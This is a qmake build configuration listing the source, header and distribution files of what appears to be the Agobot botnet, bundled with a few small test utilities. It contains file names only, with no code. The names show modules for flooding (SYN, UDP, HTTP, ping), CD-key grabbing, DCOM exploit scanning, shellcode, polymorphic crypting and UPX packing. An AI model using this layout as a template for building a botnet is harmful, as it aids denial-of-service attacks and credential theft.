TEMPLATE = app
CONFIG += console
CONFIG -= app_bundle
CONFIG -= qt

SOURCES += \
    cpp/test_lock.cpp \
    cpp/shmread.c \
    cpp/shmwrite.c \
    TcpDos.c \
    cpp/icmpraw.cpp \
    cpp/testsemp.cpp \
    cpp/changetitle.cpp \
    cpp/CRC/crc.cpp \
    cpp/Priv/configs/config-sample.cpp \
    cpp/Priv/crypt/main.cpp \
    cpp/Priv/getmd5/main.cpp \
    cpp/Priv/Prati/main.cpp \
    cpp/Priv/bot.cpp \
    cpp/Priv/cdkeygrab.cpp \
    cpp/Priv/cmdline.cpp \
    cpp/Priv/commands.cpp \
    cpp/Priv/consdbg.cpp \
    cpp/Priv/crypter.cpp \
    cpp/Priv/cstring.cpp \
    cpp/Priv/cthread.cpp \
    cpp/Priv/cvar.cpp \
    cpp/Priv/dcom2scanner.cpp \
    cpp/Priv/dcomscanner.cpp \
    cpp/Priv/ddos.cpp \
    cpp/Priv/httpflood.cpp \
    cpp/Priv/installer.cpp \
    cpp/Priv/irc.cpp \
    cpp/Priv/ircgate.cpp \
    cpp/Priv/junoflood.cpp \
    cpp/Priv/locscanner.cpp \
    cpp/Priv/mac.cpp \
    cpp/Priv/mainctrl.cpp \
    cpp/Priv/nbscanner.cpp \
    cpp/Priv/p2p.cpp \
    cpp/Priv/pingflood.cpp \
    cpp/Priv/polymorph.cpp \
    cpp/Priv/random.cpp \
    cpp/Priv/redir_gre.cpp \
    cpp/Priv/redir_http.cpp \
    cpp/Priv/redir_socks.cpp \
    cpp/Priv/redir_tcp.cpp \
    cpp/Priv/redirect.cpp \
    cpp/Priv/rsalib.cpp \
    cpp/Priv/scanner.cpp \
    cpp/Priv/sdcompat.cpp \
    cpp/Priv/shellcode.cpp \
    cpp/Priv/ssllib.cpp \
    cpp/Priv/synflood.cpp \
    cpp/Priv/udpflood.cpp \
    cpp/Priv/utility.cpp \
    cpp/Priv/wdscanner.cpp \
    cpp/Priv/ftplib/ftplib.c \
    cpp/Priv/getmd5/md5c.c \
    cpp/Priv/getmd5/r_random.c \
    cpp/Priv/rsa/desc.c \
    cpp/Priv/rsa/digit.c \
    cpp/Priv/rsa/md2c.c \
    cpp/Priv/rsa/md5c.c \
    cpp/Priv/rsa/nn.c \
    cpp/Priv/rsa/prime.c \
    cpp/Priv/rsa/r_dh.c \
    cpp/Priv/rsa/r_encode.c \
    cpp/Priv/rsa/r_enhanc.c \
    cpp/Priv/rsa/r_keygen.c \
    cpp/Priv/rsa/r_random.c \
    cpp/Priv/rsa/r_stdlib.c \
    cpp/Priv/rsa/rsa.c \
    cpp/cpuaffinity.c \
    cpp/judgeSys.c \
    Priv/agobotsvc/main.cpp \
    Priv/configs/config-sample.cpp \
    Priv/crypt/main.cpp \
    Priv/getmd5/main.cpp \
    Priv/bot.cpp \
    Priv/cdkeygrab.cpp \
    Priv/cmdline.cpp \
    Priv/commands.cpp \
    Priv/consdbg.cpp \
    Priv/crypter.cpp \
    Priv/cstring.cpp \
    Priv/cthread.cpp \
    Priv/cvar.cpp \
    Priv/dcom2scanner.cpp \
    Priv/dcomscanner.cpp \
    Priv/ddos.cpp \
    Priv/httpflood.cpp \
    Priv/installer.cpp \
    Priv/irc.cpp \
    Priv/ircgate.cpp \
    Priv/junoflood.cpp \
    Priv/locscanner.cpp \
    Priv/mac.cpp \
    Priv/mainctrl.cpp \
    Priv/nbscanner.cpp \
    Priv/p2p.cpp \
    Priv/pingflood.cpp \
    Priv/polymorph.cpp \
    Priv/random.cpp \
    Priv/redir_gre.cpp \
    Priv/redir_http.cpp \
    Priv/redir_socks.cpp \
    Priv/redir_tcp.cpp \
    Priv/redirect.cpp \
    Priv/rsalib.cpp \
    Priv/scanner.cpp \
    Priv/sdcompat.cpp \
    Priv/shellcode.cpp \
    Priv/ssllib.cpp \
    Priv/synflood.cpp \
    Priv/udpflood.cpp \
    Priv/utility.cpp \
    Priv/wdscanner.cpp \
    cpp/printUnsigedChar.c \
    Priv/ftplib/ftplib.c \
    Priv/getmd5/md5c.c \
    Priv/getmd5/r_random.c \
    Priv/rsa/desc.c \
    Priv/rsa/digit.c \
    Priv/rsa/md2c.c \
    Priv/rsa/md5c.c \
    Priv/rsa/nn.c \
    Priv/rsa/prime.c \
    Priv/rsa/r_dh.c \
    Priv/rsa/r_encode.c \
    Priv/rsa/r_enhanc.c \
    Priv/rsa/r_keygen.c \
    Priv/rsa/r_random.c \
    Priv/rsa/r_stdlib.c \
    Priv/rsa/rsa.c \
    cpp/Priv/Priv/configs/config-sample.cpp \
    cpp/Priv/Priv/crypt/main.cpp \
    cpp/Priv/Priv/getmd5/main.cpp \
    cpp/Priv/Priv/bot.cpp \
    cpp/Priv/Priv/cdkeygrab.cpp \
    cpp/Priv/Priv/cmdline.cpp \
    cpp/Priv/Priv/commands.cpp \
    cpp/Priv/Priv/config.cpp \
    cpp/Priv/Priv/consdbg.cpp \
    cpp/Priv/Priv/crypter.cpp \
    cpp/Priv/Priv/cstring.cpp \
    cpp/Priv/Priv/cthread.cpp \
    cpp/Priv/Priv/cvar.cpp \
    cpp/Priv/Priv/dcom2scanner.cpp \
    cpp/Priv/Priv/dcomscanner.cpp \
    cpp/Priv/Priv/ddos.cpp \
    cpp/Priv/Priv/httpflood.cpp \
    cpp/Priv/Priv/installer.cpp \
    cpp/Priv/Priv/irc.cpp \
    cpp/Priv/Priv/ircgate.cpp \
    cpp/Priv/Priv/junoflood.cpp \
    cpp/Priv/Priv/locscanner.cpp \
    cpp/Priv/Priv/mac.cpp \
    cpp/Priv/Priv/mainctrl.cpp \
    cpp/Priv/Priv/nbscanner.cpp \
    cpp/Priv/Priv/p2p.cpp \
    cpp/Priv/Priv/pingflood.cpp \
    cpp/Priv/Priv/polymorph.cpp \
    cpp/Priv/Priv/random.cpp \
    cpp/Priv/Priv/redir_gre.cpp \
    cpp/Priv/Priv/redir_http.cpp \
    cpp/Priv/Priv/redir_socks.cpp \
    cpp/Priv/Priv/redir_tcp.cpp \
    cpp/Priv/Priv/redirect.cpp \
    cpp/Priv/Priv/rsalib.cpp \
    cpp/Priv/Priv/scanner.cpp \
    cpp/Priv/Priv/sdcompat.cpp \
    cpp/Priv/Priv/shellcode.cpp \
    cpp/Priv/Priv/ssllib.cpp \
    cpp/Priv/Priv/synflood.cpp \
    cpp/Priv/Priv/udpflood.cpp \
    cpp/Priv/Priv/utility.cpp \
    cpp/Priv/Priv/wdscanner.cpp \
    cpp/Priv/Priv/ftplib/ftplib.c \
    cpp/Priv/Priv/getmd5/md5c.c \
    cpp/Priv/Priv/getmd5/r_random.c \
    cpp/Priv/Priv/lib/pthreads/win32/attr.c \
    cpp/Priv/Priv/lib/pthreads/win32/barrier.c \
    cpp/Priv/Priv/lib/pthreads/win32/cancel.c \
    cpp/Priv/Priv/lib/pthreads/win32/cleanup.c \
    cpp/Priv/Priv/lib/pthreads/win32/condvar.c \
    cpp/Priv/Priv/lib/pthreads/win32/create.c \
    cpp/Priv/Priv/lib/pthreads/win32/dll.c \
    cpp/Priv/Priv/lib/pthreads/win32/errno.c \
    cpp/Priv/Priv/lib/pthreads/win32/exit.c \
    cpp/Priv/Priv/lib/pthreads/win32/fork.c \
    cpp/Priv/Priv/lib/pthreads/win32/global.c \
    cpp/Priv/Priv/lib/pthreads/win32/misc.c \
    cpp/Priv/Priv/lib/pthreads/win32/mutex.c \
    cpp/Priv/Priv/lib/pthreads/win32/nonportable.c \
    cpp/Priv/Priv/lib/pthreads/win32/private.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_destroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_getdetachstate.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_getinheritsched.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_getschedparam.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_getschedpolicy.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_getscope.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_getstackaddr.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_getstacksize.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_setdetachstate.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_setinheritsched.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_setschedparam.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_setschedpolicy.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_setscope.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_setstackaddr.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_attr_setstacksize.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_barrier_destroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_barrier_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_barrier_wait.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_barrierattr_destroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_barrierattr_getpshared.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_barrierattr_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_barrierattr_setpshared.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_cancel.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_cond_destroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_cond_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_cond_signal.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_cond_wait.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_condattr_destroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_condattr_getpshared.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_condattr_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_condattr_setpshared.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_delay_np.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_detach.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_equal.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_exit.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_getconcurrency.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_getschedparam.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_getspecific.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_getw32threadhandle_np.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_join.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_key_create.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_key_delete.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_kill.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutex_destroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutex_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutex_lock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutex_timedlock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutex_trylock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutex_unlock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutexattr_destroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutexattr_getkind_np.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutexattr_getpshared.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutexattr_gettype.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutexattr_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutexattr_setkind_np.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutexattr_setpshared.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_mutexattr_settype.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_num_processors_np.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_once.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlock_destroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlock_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlock_rdlock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlock_timedrdlock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlock_timedwrlock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlock_tryrdlock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlock_trywrlock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlock_unlock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlock_wrlock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlockattr_destroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlockattr_getpshared.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlockattr_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_rwlockattr_setpshared.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_self.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_setcancelstate.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_setcanceltype.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_setconcurrency.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_setschedparam.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_setspecific.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_spin_destroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_spin_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_spin_lock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_spin_trylock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_spin_unlock.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_testcancel.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_timechange_handler_np.c \
    cpp/Priv/Priv/lib/pthreads/win32/pthread_win32_attach_detach_np.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_calloc.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_callUserDestroyRoutines.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_cond_check_need_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_decrease_semaphore.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_getprocessors.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_increase_semaphore.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_InterlockedCompareExchange.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_is_attr.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_mutex_check_need_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_new.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_processInitialize.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_processTerminate.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_reuse.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_rwlock_cancelwrwait.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_rwlock_check_need_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_spinlock_check_need_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_threadDestroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_threadStart.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_throw.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_timespec.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_tkAssocCreate.c \
    cpp/Priv/Priv/lib/pthreads/win32/ptw32_tkAssocDestroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/rwlock.c \
    cpp/Priv/Priv/lib/pthreads/win32/sched.c \
    cpp/Priv/Priv/lib/pthreads/win32/sched_get_priority_max.c \
    cpp/Priv/Priv/lib/pthreads/win32/sched_get_priority_min.c \
    cpp/Priv/Priv/lib/pthreads/win32/sched_getscheduler.c \
    cpp/Priv/Priv/lib/pthreads/win32/sched_setscheduler.c \
    cpp/Priv/Priv/lib/pthreads/win32/sched_yield.c \
    cpp/Priv/Priv/lib/pthreads/win32/sem_close.c \
    cpp/Priv/Priv/lib/pthreads/win32/sem_destroy.c \
    cpp/Priv/Priv/lib/pthreads/win32/sem_getvalue.c \
    cpp/Priv/Priv/lib/pthreads/win32/sem_init.c \
    cpp/Priv/Priv/lib/pthreads/win32/sem_open.c \
    cpp/Priv/Priv/lib/pthreads/win32/sem_post.c \
    cpp/Priv/Priv/lib/pthreads/win32/sem_post_multiple.c \
    cpp/Priv/Priv/lib/pthreads/win32/sem_timedwait.c \
    cpp/Priv/Priv/lib/pthreads/win32/sem_trywait.c \
    cpp/Priv/Priv/lib/pthreads/win32/sem_unlink.c \
    cpp/Priv/Priv/lib/pthreads/win32/sem_wait.c \
    cpp/Priv/Priv/lib/pthreads/win32/semaphore.c \
    cpp/Priv/Priv/lib/pthreads/win32/signal.c \
    cpp/Priv/Priv/lib/pthreads/win32/spin.c \
    cpp/Priv/Priv/lib/pthreads/win32/sync.c \
    cpp/Priv/Priv/lib/pthreads/win32/tsd.c \
    cpp/Priv/Priv/lib/pthreads/win32/w32_CancelableWait.c \
    cpp/Priv/Priv/rsa/desc.c \
    cpp/Priv/Priv/rsa/digit.c \
    cpp/Priv/Priv/rsa/md2c.c \
    cpp/Priv/Priv/rsa/md5c.c \
    cpp/Priv/Priv/rsa/nn.c \
    cpp/Priv/Priv/rsa/prime.c \
    cpp/Priv/Priv/rsa/r_dh.c \
    cpp/Priv/Priv/rsa/r_encode.c \
    cpp/Priv/Priv/rsa/r_enhanc.c \
    cpp/Priv/Priv/rsa/r_keygen.c \
    cpp/Priv/Priv/rsa/r_random.c \
    cpp/Priv/Priv/rsa/r_stdlib.c \
    cpp/Priv/Priv/rsa/rsa.c \
    cpp/cstring.cpp

DISTFILES += \
    .vimrc \
    README.md \
    pythons/client.py \
    cpp/judgeSys \
    cpp/test_lock \
    cpp/Priv/bin/linux/packit.sh \
    cpp/Priv/bin/linux/upxit.sh \
    cpp/Priv/debug.sh \
    .vim/doc/NERDTree.txt \
    .vim/doc/taglist.txt \
    .vim/plugin/NERD_tree.vim \
    .vim/plugin/taglist.vim \
    cpp/Priv/configs/gpl.txt \
    cpp/Priv/crypt/crypt.dsp \
    cpp/Priv/crypt/gpl.txt \
    cpp/Priv/getmd5/getmd5.dsp \
    cpp/Priv/getmd5/gpl.txt \
    cpp/Priv/Prati/gpl.txt \
    cpp/Priv/bugs.txt \
    cpp/Priv/contrib.txt \
    cpp/Priv/design.txt \
    cpp/Priv/disclaimer.txt \
    cpp/Priv/gpl.txt \
    cpp/Priv/readme.txt \
    cpp/Priv/tested.txt \
    cpp/Priv/todo.txt \
    tags \
    cscope.in.out \
    cscope.po.out \
    Priv/bin/linux/packit.sh \
    Priv/bin/linux/upxit.sh \
    Priv/debug.sh \
    Priv/agobotsvc/gpl.txt \
    Priv/configs/gpl.txt \
    Priv/crypt/crypt.dsp \
    Priv/crypt/gpl.txt \
    Priv/getmd5/getmd5.dsp \
    Priv/getmd5/gpl.txt \
    Priv/bugs.txt \
    Priv/contrib.txt \
    Priv/design.txt \
    Priv/disclaimer.txt \
    Priv/gpl.txt \
    Priv/readme.txt \
    Priv/tested.txt \
    Priv/todo.txt \
    cscope.out \
    cpp/Priv/Priv/lib/openssl/linux/lib/libcrypto.a \
    cpp/Priv/Priv/lib/openssl/linux/lib/libssl.a \
    cpp/Priv/Priv/crypt/crypt \
    cpp/Priv/Priv/getmd5/getmd5 \
    cpp/Priv/Priv/debug.sh \
    cpp/Priv/Priv/doc/agobot3.jpg \
    cpp/Priv/Priv/doc/agobug.jpg \
    cpp/Priv/Priv/doc/agoglow.jpg \
    cpp/Priv/Priv/doc/commandref.html \
    cpp/Priv/Priv/doc/faq.html \
    cpp/Priv/Priv/configs/gpl.txt \
    cpp/Priv/Priv/crypt/crypt.dsp \
    cpp/Priv/Priv/crypt/gpl.txt \
    cpp/Priv/Priv/doc/CVS/Entries \
    cpp/Priv/Priv/doc/CVS/Repository \
    cpp/Priv/Priv/doc/CVS/Root \
    cpp/Priv/Priv/doc/gpl.txt \
    cpp/Priv/Priv/getmd5/getmd5.dsp \
    cpp/Priv/Priv/getmd5/gpl.txt \
    cpp/Priv/Priv/lib/adns/linux/CVS/Entries \
    cpp/Priv/Priv/lib/adns/linux/CVS/Repository \
    cpp/Priv/Priv/lib/adns/linux/CVS/Root \
    cpp/Priv/Priv/lib/adns/readme.txt \
    cpp/Priv/Priv/lib/openssl/linux/CVS/Entries \
    cpp/Priv/Priv/lib/openssl/linux/CVS/Repository \
    cpp/Priv/Priv/lib/openssl/linux/CVS/Root \
    cpp/Priv/Priv/lib/openssl/linux/include/CVS/Entries \
    cpp/Priv/Priv/lib/openssl/linux/include/CVS/Repository \
    cpp/Priv/Priv/lib/openssl/linux/include/CVS/Root \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/CVS/Entries \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/CVS/Repository \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/CVS/Root \
    cpp/Priv/Priv/lib/openssl/linux/lib/CVS/Entries \
    cpp/Priv/Priv/lib/openssl/linux/lib/CVS/Repository \
    cpp/Priv/Priv/lib/openssl/linux/lib/CVS/Root \
    cpp/Priv/Priv/lib/pthreads/CVS/Entries \
    cpp/Priv/Priv/lib/pthreads/CVS/Repository \
    cpp/Priv/Priv/lib/pthreads/CVS/Root \
    cpp/Priv/Priv/lib/pthreads/linux/CVS/Entries \
    cpp/Priv/Priv/lib/pthreads/linux/CVS/Repository \
    cpp/Priv/Priv/lib/pthreads/linux/CVS/Root \
    cpp/Priv/Priv/lib/pthreads/win32/CVS/Entries \
    cpp/Priv/Priv/lib/pthreads/win32/CVS/Repository \
    cpp/Priv/Priv/lib/pthreads/win32/CVS/Root \
    cpp/Priv/Priv/bugs.txt \
    cpp/Priv/Priv/contrib.txt \
    cpp/Priv/Priv/design.txt \
    cpp/Priv/Priv/disclaimer.txt \
    cpp/Priv/Priv/gpl.txt \
    cpp/Priv/Priv/readme.txt \
    cpp/Priv/Priv/tested.txt \
    cpp/Priv/Priv/todo.txt \
    cpp/Priv/Priv/lib/openssl/linux/CVS/Entries.Log \
    cpp/Priv/Priv/lib/openssl/linux/include/CVS/Entries.Log \
    cpp/Priv/Priv/lib/pthreads/CVS/Entries.Log

HEADERS += \
    cpp/shmdata.h \
    cpp/CRC/crc.h \
    cpp/Priv/ftplib/ftplib.h \
    cpp/Priv/getmd5/global.h \
    cpp/Priv/getmd5/md5.h \
    cpp/Priv/getmd5/r_random.h \
    cpp/Priv/getmd5/rsaref.h \
    cpp/Priv/rsa/des.h \
    cpp/Priv/rsa/digit.h \
    cpp/Priv/rsa/global.h \
    cpp/Priv/rsa/md2.h \
    cpp/Priv/rsa/md5.h \
    cpp/Priv/rsa/nn.h \
    cpp/Priv/rsa/prime.h \
    cpp/Priv/rsa/r_random.h \
    cpp/Priv/rsa/rsa.h \
    cpp/Priv/rsa/rsaref.h \
    cpp/Priv/bot.h \
    cpp/Priv/cdkeygrab.h \
    cpp/Priv/cmdbase.h \
    cpp/Priv/cmdline.h \
    cpp/Priv/cmdopt.h \
    cpp/Priv/commands.h \
    cpp/Priv/consdbg.h \
    cpp/Priv/crypter.h \
    cpp/Priv/cstring.h \
    cpp/Priv/cthread.h \
    cpp/Priv/cvar.h \
    cpp/Priv/dcom2scanner.h \
    cpp/Priv/dcomscanner.h \
    cpp/Priv/ddos.h \
    cpp/Priv/httpflood.h \
    cpp/Priv/installer.h \
    cpp/Priv/irc.h \
    cpp/Priv/ircgate.h \
    cpp/Priv/junoflood.h \
    cpp/Priv/locscanner.h \
    cpp/Priv/mac.h \
    cpp/Priv/main.h \
    cpp/Priv/mainctrl.h \
    cpp/Priv/message.h \
    cpp/Priv/nbscanner.h \
    cpp/Priv/p2p.h \
    cpp/Priv/pingflood.h \
    cpp/Priv/polymorph.h \
    cpp/Priv/random.h \
    cpp/Priv/redir_gre.h \
    cpp/Priv/redir_http.h \
    cpp/Priv/redir_socks.h \
    cpp/Priv/redir_tcp.h \
    cpp/Priv/redirect.h \
    cpp/Priv/resource.h \
    cpp/Priv/rsalib.h \
    cpp/Priv/scanner.h \
    cpp/Priv/sdcompat.h \
    cpp/Priv/shellcode.h \
    cpp/Priv/ssllib.h \
    cpp/Priv/synflood.h \
    cpp/Priv/udpflood.h \
    cpp/Priv/utility.h \
    cpp/Priv/wdscanner.h \
    Priv/ftplib/ftplib.h \
    Priv/getmd5/global.h \
    Priv/getmd5/md5.h \
    Priv/getmd5/r_random.h \
    Priv/getmd5/rsaref.h \
    Priv/rsa/des.h \
    Priv/rsa/digit.h \
    Priv/rsa/global.h \
    Priv/rsa/md2.h \
    Priv/rsa/md5.h \
    Priv/rsa/nn.h \
    Priv/rsa/prime.h \
    Priv/rsa/r_random.h \
    Priv/rsa/rsa.h \
    Priv/rsa/rsaref.h \
    Priv/bot.h \
    Priv/cdkeygrab.h \
    Priv/cmdbase.h \
    Priv/cmdline.h \
    Priv/cmdopt.h \
    Priv/commands.h \
    Priv/consdbg.h \
    Priv/crypter.h \
    Priv/cstring.h \
    Priv/cthread.h \
    Priv/cvar.h \
    Priv/dcom2scanner.h \
    Priv/dcomscanner.h \
    Priv/ddos.h \
    Priv/httpflood.h \
    Priv/installer.h \
    Priv/irc.h \
    Priv/ircgate.h \
    Priv/junoflood.h \
    Priv/locscanner.h \
    Priv/mac.h \
    Priv/main.h \
    Priv/mainctrl.h \
    Priv/message.h \
    Priv/nbscanner.h \
    Priv/p2p.h \
    Priv/pingflood.h \
    Priv/polymorph.h \
    Priv/random.h \
    Priv/redir_gre.h \
    Priv/redir_http.h \
    Priv/redir_socks.h \
    Priv/redir_tcp.h \
    Priv/redirect.h \
    Priv/resource.h \
    Priv/rsalib.h \
    Priv/scanner.h \
    Priv/sdcompat.h \
    Priv/shellcode.h \
    Priv/ssllib.h \
    Priv/synflood.h \
    Priv/udpflood.h \
    Priv/utility.h \
    Priv/wdscanner.h \
    cpp/Priv/Priv/ftplib/ftplib.h \
    cpp/Priv/Priv/getmd5/global.h \
    cpp/Priv/Priv/getmd5/md5.h \
    cpp/Priv/Priv/getmd5/r_random.h \
    cpp/Priv/Priv/getmd5/rsaref.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/aes.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/asn1.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/asn1_mac.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/asn1t.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/bio.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/blowfish.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/bn.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/buffer.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/cast.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/comp.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/conf.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/conf_api.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/crypto.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/des.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/des_old.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/dh.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/dsa.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/dso.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/e_os2.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/ebcdic.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/ec.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/engine.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/err.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/evp.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/hmac.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/idea.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/krb5_asn.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/kssl.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/lhash.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/md2.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/md4.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/md5.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/mdc2.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/obj_mac.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/objects.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/ocsp.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/opensslconf.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/opensslv.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/ossl_typ.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/pem.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/pem2.h \
